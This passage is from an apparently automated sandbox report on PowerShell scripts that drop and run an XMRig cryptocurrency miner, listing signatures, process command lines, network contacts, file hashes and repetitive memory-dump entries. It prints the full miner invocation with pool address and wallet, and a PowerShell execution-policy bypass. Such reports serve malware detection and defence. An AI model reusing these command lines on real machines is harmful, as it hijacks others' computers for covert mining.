memory/1528-80-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-81-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-82-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-83-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-84-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-85-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-86-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-87-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-88-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-89-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-90-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-91-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-92-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-93-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-94-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-95-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-96-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-97-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-98-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-99-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-100-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-101-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-102-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-103-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-104-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-105-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-106-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-107-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-108-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-109-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-110-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-111-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-112-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-113-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-114-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-115-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-116-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-117-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-118-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:38

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1036,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=3916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1644,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=3944 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 3.17.178.52.in-addr.arpa udp

Files

memory/1492-0-0x00007FFE9C853000-0x00007FFE9C855000-memory.dmp

memory/1492-10-0x0000026E13270000-0x0000026E13292000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kb0hjamg.wg5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1492-11-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/1492-12-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/1492-14-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/1492-15-0x0000026E132E0000-0x0000026E132F2000-memory.dmp

memory/1492-16-0x0000026E131E0000-0x0000026E131EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4172-47-0x0000029AE8820000-0x0000029AE8840000-memory.dmp

memory/4172-48-0x0000029AE8A90000-0x0000029AE8AB0000-memory.dmp

memory/4172-49-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-51-0x0000029B7CE10000-0x0000029B7CE30000-memory.dmp

memory/4172-50-0x0000029AE8AB0000-0x0000029AE8AD0000-memory.dmp

memory/1492-53-0x00007FFE9C853000-0x00007FFE9C855000-memory.dmp

memory/4172-52-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/1492-54-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/4172-55-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/1492-56-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/4172-59-0x0000029B7CE10000-0x0000029B7CE30000-memory.dmp

memory/4172-58-0x0000029AE8AB0000-0x0000029AE8AD0000-memory.dmp

memory/4172-57-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-60-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-61-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-62-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-63-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-64-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-65-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-66-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-67-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-68-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-69-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-70-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-71-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-72-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-73-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-74-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-75-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-76-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-77-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-78-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-79-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-80-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-81-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-82-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-83-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-84-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-85-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-86-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-87-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-88-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-89-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-90-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-91-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-92-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-93-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-94-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-95-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-96-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-97-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-98-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-99-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-100-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-101-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-102-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-103-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-104-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-105-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-106-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-107-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-108-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-109-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-110-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-111-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-112-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-113-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-114-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-115-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-116-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-117-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-118-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:38

Platform

win11-20240426-en

Max time kernel

1793s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2380-0-0x00007FF863373000-0x00007FF863375000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wcwoxbfd.kgp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2380-1-0x00000263C8550000-0x00000263C8572000-memory.dmp

memory/2380-10-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2380-11-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2380-12-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2380-14-0x00000263E0BD0000-0x00000263E0BE2000-memory.dmp

memory/2380-15-0x00000263E0AC0000-0x00000263E0ACA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2792-46-0x0000019C6B7B0000-0x0000019C6B7D0000-memory.dmp

memory/2792-47-0x0000019C6B7F0000-0x0000019C6B810000-memory.dmp

memory/2792-48-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2380-50-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2380-49-0x00007FF863373000-0x00007FF863375000-memory.dmp

memory/2792-53-0x0000019C6B830000-0x0000019C6B850000-memory.dmp

memory/2792-51-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-52-0x0000019C6B810000-0x0000019C6B830000-memory.dmp

memory/2380-54-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2792-55-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-56-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-58-0x0000019C6B830000-0x0000019C6B850000-memory.dmp

memory/2792-57-0x0000019C6B810000-0x0000019C6B830000-memory.dmp

memory/2792-59-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-60-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-61-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-62-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-63-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-64-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-65-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-66-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-67-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-68-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-69-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-70-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-71-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-72-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-73-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-74-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-75-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-76-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-77-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-78-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-79-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-80-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-81-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-82-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-83-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-84-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-85-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-86-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-87-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-88-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-89-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-90-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-91-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-92-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-93-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-94-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-95-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-96-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-97-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-98-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-99-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-100-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-101-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-102-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-103-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-104-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-105-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-106-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-107-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-108-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-109-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-110-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-111-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-112-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-113-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-114-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-115-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-116-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-117-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:39

Platform

win10v2004-20240426-en

Max time kernel

1796s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
